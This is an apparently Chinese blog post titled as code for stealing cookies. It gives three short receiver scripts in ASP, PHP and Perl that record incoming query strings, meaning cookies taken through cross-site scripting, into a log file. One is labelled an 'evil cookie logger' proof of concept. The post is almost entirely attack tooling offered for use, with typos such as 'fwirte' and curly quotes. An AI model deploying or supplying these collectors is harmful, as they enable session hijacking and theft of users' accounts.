盜取cookies的代碼(asp,php,perl)

ASP版


<%
dim strfilename
strfilename = “mydata.txt” 數據文件存放目錄
set lP=server.createObject(“Adodb.Stream”)
lP.Open
lP.Type=2
lP.CharSet=”gb2312″
lP.writetext request.Servervariables(“QUERY_STRING”)
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>


PHP版
<?php
$info = getenv(“QUERY_STRING”);
if ($info) {
$info=urldecode($info);
$fp = fopen(“info.txt”,”a”);
fwirte($fp,$info.”

“);
fclose($fp);
}
?>


PERL版
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.


$borrowed_info = $ENV{QUERY_STRING};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(“C”, hex($1))/eg;


open(EVIL_COOKIE_LOG, “>>evil_cookie_log”) or print “Content-type:
text/html

something went wrong
“;
print EVIL_COOKIE_LOG “$borrowed_info
“;
print “Content-type: text/html

“;
close(EVIL_COOKIE_LOG);

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *